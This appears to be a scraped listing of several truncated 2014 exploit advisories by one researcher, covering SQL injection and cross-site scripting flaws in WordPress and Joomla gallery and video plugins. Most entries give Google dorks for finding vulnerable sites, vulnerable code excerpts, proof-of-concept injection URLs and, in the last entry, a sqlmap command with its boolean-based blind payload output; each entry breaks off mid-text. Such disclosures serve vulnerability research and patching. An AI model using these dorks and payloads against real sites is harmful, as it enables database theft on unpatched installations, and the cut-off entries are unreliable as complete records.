######################
# Exploit Title : WordPress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://huge-it.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip (Fixed)
Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs
# Date : 2014-08-25
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php
######################
# Vulnerable code :
function editgallery($id)
{
global $wpdb;
if(isset($_GET["removeslide"])){
if($_GET["removeslide"] !...
######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
# Dork Google: inurl:/component/spidervideoplayer
inurl:option=com_spidervideoplayer # Date : 2014-08-26
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
"theme" variable is not sanitized.
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
[email protected]
https://www....
######################
# Exploit Title : WordPress GB Gallery Slideshow 1.5 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://gb-plugins.com/
# Software Link : http://downloads.wordpress.org/plugin/gb-gallery-slideshow.1.5.zip
# Date : 2014-08-09
# Tested on : Linux / sqlmap 1.0-dev-5b2ded0
Linux / Mozilla Firefox
######################
# Location : http://localhost/wp-content/plugins/gb-gallery-slideshow/GBgallery.php
######################
# Vulnerable code :
if(isset($_POST['selected_group'])){
global $gb_post_type, $gb_group_table, $wpdb;
$my_group_id = $_POST['selected_group'];
$my_group = $wpdb->get_results( "SELECT groups FROM $gb_group_table WHERE id = "....
######################
# Exploit Title : WordPress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
# Software Link : http://downloads.wordpress.org/plugin/contus-video-gallery.2.5.zip
# Dork Google: inurl:/contus-video-gallery/hdflvplayer/hdplayer.swf
(Click on "Repeat the search with the omitted results included")
# Date : 2014-07-15
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1....
######################
# Exploit Title : WordPress Gallery Objects 0.4 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://galleryobjects.com/
# Software Link : http://downloads.wordpress.org/plugin/gallery-objects.0.4.zip
# Dork Google: inurl:/admin-ajax.php?action=go_view_object # Date : 2014-07-18
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
Poc via Browser:
http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html
sqlmap:
sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid
---
Place: GET
Parameter: viewid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html
---
#####################
Discovered By : Claudio Viviani
http://www....